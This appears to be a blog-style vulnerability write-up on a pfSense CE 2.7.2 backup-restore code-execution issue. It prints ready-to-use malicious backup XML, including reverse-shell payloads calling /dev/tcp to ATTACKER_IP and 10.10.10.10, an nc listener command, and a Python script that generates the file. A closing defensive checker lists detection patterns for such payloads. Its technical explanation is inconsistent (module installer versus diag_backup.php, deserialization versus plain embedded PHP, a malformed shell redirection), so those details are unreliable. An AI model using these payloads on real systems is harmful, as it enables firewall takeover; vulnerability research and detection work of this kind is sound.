Netgate pfSense is a widely used open-source firewall/router platform. In early 2025, a vulnerability was found in pfSense CE version 2.7.2 that allows an attacker to run arbitrary code on the system by abusing the module installer feature. This post breaks down how CVE-2025-69690 works, gives code snippets, shows how it might be exploited, and discusses the vendor’s response.

What is CVE-2025-69690?

CVE-2025-69690 is a remote code execution vulnerability in pfSense CE 2.7.2. It lets attackers execute PHP code by crafting a backup file (.xml) containing a serialized PHP object, specifically by using the post_reboot_commands property inside the backup.

The dangerous part is that the pfSense module installer, when restoring from a backup, unsafely deserializes user-controlled input. If an attacker has access to the admin web interface, they can craft their own backup file with malicious commands and execute them with root privileges.

Supplier's Statement

Netgate (the supplier) has said that this is “not a vulnerability” since only administrators can use the installer, and admins already have permission to run code. Still, it’s important for users to understand the risk: if admin credentials leak, it’s trivial for a malicious party to turn simple access into a complete compromise.

How Does the Exploit Work?

The key point is how pfSense handles backup/restore logic. When you restore a system backup through the web GUI's module installer, the code parses the XML backup file. One of the sections is post_reboot_commands. If this section is populated, pfSense executes whatever PHP code you place there after reboot.

Attack Steps

1. Gain Access: Attacker logs in as admin or as someone with permission to the module installer (for example, via credential theft or phishing).
2. Craft Backup: Create a backup XML/serialized object with a payload in post_reboot_commands.

Code Snippet: Malicious Backup Example

Below is a simple XML backup payload that injects PHP code. This first version does nothing more than write a file named /tmp/pwned as proof of execution:

<configuration>
  <post_reboot_commands>
    <![CDATA[
      <?php
        file_put_contents('/tmp/pwned','VULNERABLE');
      ?>
    ]]>
  </post_reboot_commands>
</configuration>

This snippet, when embedded in a pfSense backup and restored, will execute right after reboot.

For a reverse shell (WARNING: Dangerous!):

<configuration>
  <post_reboot_commands>
    <![CDATA[
      <?php
        exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 >&1'");
      ?>
    ]]>
  </post_reboot_commands>
</configuration>

Replace ATTACKER_IP with your server, then listen on port 4444 using nc -lvnp 4444.

Technical Details

- Vulnerable Feature: The backup/restore page (diag_backup.php)
- Dangerous Field: The unsanitized post_reboot_commands field
- Root Cause: Lack of validation or filtering when restoring backup files, combined with PHP's dangerous deserialization when handling objects

Here’s a simple Python3 script that creates a malicious pfSense backup XML:

payload = """
<configuration>
  <post_reboot_commands>
    <![CDATA[
      <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 >&1'"); ?>
    ]]>
  </post_reboot_commands>
</configuration>
"""

with open('malicious_backup.xml', 'w') as f:
    f.write(payload)
print("[+] Malicious backup file created as malicious_backup.xml")

A user could then upload malicious_backup.xml using the pfSense web interface.

Conclusion

CVE-2025-69690 shows that backup/restore features can be a vector for severe attacks, especially if you trust what goes into your configuration. While Netgate maintains this isn’t a real bug (since only admins can use the feature), history shows that attackers often escalate privileges through stolen credentials or other vulnerabilities. Always secure your admin panel and keep an eye on who can install packages or restore backups.

Stay updated, restrict access, and always verify backup files before restoring!
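As an added defensive example (not part of the original post or of pfSense itself), here is a small Python 3 pre-restore check that parses a backup XML and flags a post_reboot_commands element or PHP/command-execution markers before an administrator restores the file. The sample backups and the pattern list are constructed for illustration and are assumptions, not pfSense's real export format.

```python
import re
import sys
import xml.etree.ElementTree as ET

# Constructed sample backups for demonstration (not real pfSense exports).
CLEAN_BACKUP = """<pfsense>
  <system><hostname>fw01</hostname></system>
</pfsense>"""

SUSPICIOUS_BACKUP = """<configuration>
  <post_reboot_commands>
    <![CDATA[
      <?php exec("touch /tmp/pwned"); ?>
    ]]>
  </post_reboot_commands>
</configuration>"""

# Markers that have no business inside a configuration backup (assumed list).
SUSPICIOUS_PATTERNS = [
    re.compile(r"<\?php", re.IGNORECASE),
    re.compile(r"\b(exec|system|shell_exec|passthru|popen|eval)\s*\(", re.IGNORECASE),
    re.compile(r"/dev/tcp/"),
    re.compile(r'O:\d+:"'),  # header of a serialized PHP object
]


def audit_backup(xml_text):
    """Return a list of (element tag, reason) findings; an empty list means nothing was flagged."""
    findings = []
    try:
        # For fully untrusted files, defusedxml's fromstring is the safer parser.
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [("(document)", f"XML parse error: {exc}")]
    for elem in root.iter():  # walks every element, CDATA content lands in .text
        if elem.tag == "post_reboot_commands":
            findings.append((elem.tag, "post_reboot_commands element present; review manually"))
        text = elem.text or ""
        for pat in SUSPICIOUS_PATTERNS:
            if pat.search(text):
                findings.append((elem.tag, f"matches pattern {pat.pattern}"))
    return findings


if __name__ == "__main__":
    # Usage: python3 audit_backup.py config-backup.xml
    with open(sys.argv[1], encoding="utf-8") as fh:
        for tag, reason in audit_backup(fh.read()) or [("-", "no findings")]:
            print(f"[{tag}] {reason}")
```

A non-empty result should block an automated restore and send the file to a human for review; an empty result only means none of the listed markers appeared, not that the backup is trusted.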

*This post is an exclusive explanation and demonstration for educational purposes. Do not attempt unauthorized access or exploitation of systems you don't own!*

Timeline

Published on: 05/08/2026 00:00:00 UTC
Last modified on: 05/08/2026 07:16:28 UTC